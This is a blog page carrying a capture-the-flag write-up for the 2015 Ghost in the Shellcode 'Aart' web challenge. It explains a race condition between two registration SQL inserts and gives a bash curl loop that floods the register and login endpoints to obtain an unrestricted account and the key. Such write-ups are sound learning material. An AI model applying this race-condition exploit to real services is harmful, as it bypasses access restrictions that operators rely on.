<!DOCTYPE html>
<html>

    <head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Ghost-in-the-Shellcode - Aart Web Writeup</title>
<meta name="description" content="Software is like underwear. Update it regularly.">

<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css">
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css">
<link rel="stylesheet" type="text/css" media="all" href="/css/style.css" />
<link rel="stylesheet" type="text/css" media="all" href="/css/jquery.mmenu.all.css" />
<link rel="stylesheet" href="/css/highlightjs.piperita.css">

<!-- Favicons generated at http://realfavicongenerator.net/ -->
<link rel="apple-touch-icon" sizes="57x57" href="/favicons/apple-touch-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="/favicons/apple-touch-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="/favicons/apple-touch-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="/favicons/apple-touch-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="/favicons/apple-touch-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="/favicons/apple-touch-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="/favicons/apple-touch-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="/favicons/apple-touch-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="/favicons/apple-touch-icon-180x180.png">
<link rel="icon" type="image/png" href="/favicons/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="/favicons/android-chrome-192x192.png" sizes="192x192">
<link rel="icon" type="image/png" href="/favicons/favicon-96x96.png" sizes="96x96">
<link rel="icon" type="image/png" href="/favicons/favicon-16x16.png" sizes="16x16">
<link rel="manifest" href="/favicons/manifest.json">
<link rel="shortcut icon" href="/favicons/favicon.ico">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-TileImage" content="/favicons/mstile-144x144.png">
<meta name="msapplication-config" content="/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


</head>


    <body>

    <nav id="my-menu">
  <div>
    <p>MisterChOc</p>

    <ul class="pages">
      <li><a href="/"><i class="fa fa-home"></i> Home</a></li>
      <li><a href="/posts/"><i class="fa fa-archive"></i> All Posts</a></li>
      <li><a href="/search/"><i class="fa fa-search"></i> Search</a></li>
    </ul>

    <p class="links">
  <a href="http://www.twitter.com/misterch0c" target="_new"><i class="fa fa-twitter"></i></a>
  
  
  <a href="https://github.com/misterch0c" target="_new"><i class="fa fa-github-alt"></i></a>
  
  <a href="/feed.xml" target="_new"><i class="fa fa-rss"></i></a>
</p>

  </div>
</nav>
<div class="menu-button" href="#menu"><i class="fa fa-bars"></i></div>


    <div class="page-content">
      <div class="wrap">
      

<div class="container-fluid single">
  <div class="row">

    <div itemscope itemtype="http://schema.org/Article" class="col-md-12 article">
      
      <div class="thumb">
        <i class="fa fa-cogs fa-4x"></i>
      </div>
      

      <h1 class="header" itemprop="name">Ghost-in-the-Shellcode - Aart Web Writeup</h1>

      <div class="author">
        <small><i>
          
          on <span itemprop="datePublished" content="2014-08-28">January 18, 2015</span>
           under jekyll
        </i></small>
      </div>

      <div class="read-time">
        <small>
          1 minute read
        </small>
      </div>

      <div class="content-panel content">
        <span itemprop="articleBody"><h1>[GITS-CTF2015] Aart - web writeup</h1>

<p>The <a href="https://2015.ghostintheshellcode.com/">Ghost in the Shellcode CTF</a> is now over but the website is still up and you can still complete challenges if you like (update: well not anymore..)<br>
This is my little write up and the web challenge called &quot;Aart&quot;. Here&#39;s how it looks when you go to the server for the firsttime  </p>

<p><img src="http://i.imgur.com/GgqOl5N.png" alt="">  </p>

<p>On the register page there was a &quot;Source code&quot; link so I downloaded the code and took a look at it. I noticed 2 interesting things<br>
Firstly the 2 SQL requests that are made when a user register  </p>

<p><img src="http://i.imgur.com/1qQ1z0n.png" alt="">  </p>

<p>Then in this portion of code you can actually see that if isRestricted is true then your account is restricted and otherwise you can get the key.</p>

<p><img src="http://imgur.com/jLrb3C5.png" alt="">  </p>

<p>If you still didn&#39;t get it we&#39;re just going to register/login a bunch of usernames and wait for the key (:<br>
It&#39;s a timing thing. At some point the first INSERT TO will be called twice before the second one has even been called once. This will give us a user with no restricted flag.  </p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="k">for </span>i <span class="k">in</span> <span class="o">{</span>1..50<span class="o">}</span>;
<span class="k">do     
</span>curl --data <span class="s2">"username=i</span><span class="nv">$i</span><span class="s2">&amp;password=i"</span> http://aart.2015.ghostintheshellcode.com/register.php -s &gt;&amp;1 &gt;/dev/null &amp;     
curl --data <span class="s2">"username=i</span><span class="nv">$i</span><span class="s2">&amp;password=i"</span> http://aart.2015.ghostintheshellcode.com/login.php;
<span class="k">done</span></code></pre></figure>

<p>So this script is going to create accounts from &#39;i1&#39; to &#39;i50&#39; with the password &#39;i&#39;. At some point we stumble on an unrestricted account  </p>

<p>Here we go. &quot;this is a key&quot; was actually the key here (;</p>
</span>

        

        
        <div class="tags">
          <small>
          <i class="fa fa-tags"></i>
            demo, action, carte, noire
          </small>
        </div>
        

      </div>

      <div class="content-panel feedback">
        I <i class="fa fa-heart"></i> feedback.<br />
        Let me know what you think of this article on twitter <a href="http://www.twitter.com/misterch0c">@misterch0c</a> or leave a comment below!
      </div>

      
      <div class="content-panel comments">
        <div id="disqus_thread">
          <noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
          <a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
        </div>
      </div>
      

      

    </div>

  </div>

</div>


<script type="text/javascript">
/* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
function disqus_config() { this.experiment.enable_scroll_container = true; }
var disqus_shortname = "misterch0c"; // required: replace example with your forum shortname
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
  var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
  dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
  (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>


      </div>
    </div>

    <div class="footer clearfix">
  <div class="col-md-6">
    
  </div>
  <div class="col-md-6">
    &lt;/&gt; on <a href="https://github.com/jacobtomlinson/carte-noire">Github</a> &nbsp;<i class="fa fa-github-alt"></i>
  </div>
</div>

<script src="//code.jquery.com/jquery-1.11.0.min.js"></script>
<script src="//netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js"></script>
<script src="/js/jquery.mmenu.min.all.js"></script>
<script src="http://cdnjs.cloudflare.com/ajax/libs/highlight.js/8.7/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
<script type="text/javascript">
   $(document).ready(function() {
      $("#my-menu").mmenu().on( "closed.mm", function() {
            $(".menu-button").show();
         });
      $(".menu-button").click(function() {
        $(".menu-button").hide();
        $("#my-menu").trigger("open.mm");
      });
   });
</script>


<script type="text/javascript">
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-43267317-1']);
          _gaq.push(['_trackPageview']);
  (function () {
      var ga = document.createElement('script');
      ga.type = 'text/javascript';
      ga.async = true;
      ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

      var s = document.getElementsByTagName('script')[0];
      s.parentNode.insertBefore(ga, s);
  })();
</script>



    </body>
</html>
